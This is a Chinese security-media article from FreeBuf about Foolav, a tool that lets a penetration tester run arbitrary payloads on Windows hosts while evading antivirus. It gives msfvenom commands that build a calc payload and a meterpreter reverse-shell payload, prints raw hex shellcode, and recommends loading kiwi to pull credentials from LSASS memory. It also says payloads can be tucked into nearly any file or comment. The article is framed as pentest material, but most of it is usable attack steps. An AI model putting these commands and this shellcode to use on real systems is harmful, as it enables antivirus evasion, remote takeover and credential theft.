主站

分类

漏洞 工具 极客 web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据库安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

Foolav:免杀小工具+win主机运行任意payload 金币
2016-02-25 10:22:16

Metasploit

在渗透测试中,当你需要执行如meterpreter等的payload,而又需要做免杀时,下面这段代码编译的exe也许会对你产生帮助。你需要做的就是上传这两个文件,同目录下的可执行exe文件和payload文件。

实验指南

1.准备好你的payload(32位系统):

calc(计算器实验版本):

msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -ex86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep"^\"" | tr -d "\"\n;" >foolav.mf注意:你在这里并不需要使用编码或者避免使用敏感字符,它肯定会起作用的。

meterpreter(实战反弹shell版本):

msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -ax86 -f c 2>/dev/null | egrep "^\"" | tr -d"\"\n;" >foolav.mf

2.payload文件(与exe文件重名,但后缀为mf),拷贝到与exe文件同目录,然后可以通过下面的命令启动calc.exe:

 # calc.exe \xbb\x28\x30\x85\x5b\xd9\xf7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x5a\x0e\x03\x72\x3e\x67\xae\x7e\xd6\xee\x51\x7e\x27\x91\xd8\x9b\x16\x83\xbf\xe8\x0b\x13\xcb\xbc\xa7\xd8\x99\x54\x33\xac\x35\x5b\xf4\x1b\x60\x52\x05\xaa\xac\x38\xc5\xac\x50\x42\x1a\x0f\x68\x8d\x6f\x4e\xad\xf3\x80\x02\x66\x78\x32\xb3\x03\x3c\x8f\xb2\xc3\x4b\xaf\xcc\x66\x8b\x44\x67\x68\xdb\xf5\xfc\x22\xc3\x7e\x5a\x93\xf2\x53\xb8\xef\xbd\xd8\x0b\x9b\x3c\x09\x42\x64\x0f\x75\x09\x5b\xa0\x78\x53\x9b\x06\x63\x26\xd7\x75\x1e\x31\x2c\x04\xc4\xb4\xb1\xae\x8f\x6f\x12\x4f\x43\xe9\xd1\x43\x28\x7d\xbd\x47\xaf\x52\xb5\x73\x24\x55\x1a\xf2\x7e\x72\xbe\x5f\x24\x1b\xe7\x05\x8b\x24\xf7\xe1\x74\x81\x73\x03\x60\xb3\xd9\x49\x77\x31\x64\x34\x77\x49\x67\x16\x10\x78\xec\xf9\x67\x85\x27\xbe\x88\x67\xe2\xca\x20\x3e\x67\x77\x2d\xc1\x5d\xbb\x48\x42\x54\x43\xaf\x5a\x1d\x46\xeb\xdc\xcd\x3a\x64\x89\xf1\xe9\x85\x98\x91\x6c\x16\x40\x78\x0b\x9e\xe3\x84 

3.如下图,一旦运行了可执行exe文件(foolav.exe),这里附上下载地址。payload文件(foolav.mf)就会被解析,导入单独线程,在内存中执行相应的功能:

Foolav_01.png

提示

x86文件在x86和x86_64windows系统都可以运行,你可以使用x86下的payload。然而,x86的meterpreter是可以迁移到x86_64进程的。此后你如果运行:

load kiwi

它会加载x86_64版本,保证可以从内存里访问LSASS进程中的敏感内容:

Foolav_02.png

.mf文件自然是被加密混淆的,解析器会忽略除了16进制(\xHH)的其他字符。这意味着它可以把你的payload加入几乎任何文件,甚至加入你自己的评论里:

Foolav_03.png

 *参考来源:github,FB小编dawner编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)    

本文作者:, 转载请注明来自FreeBuf.COM

# payload # 免杀 # Foolav
被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦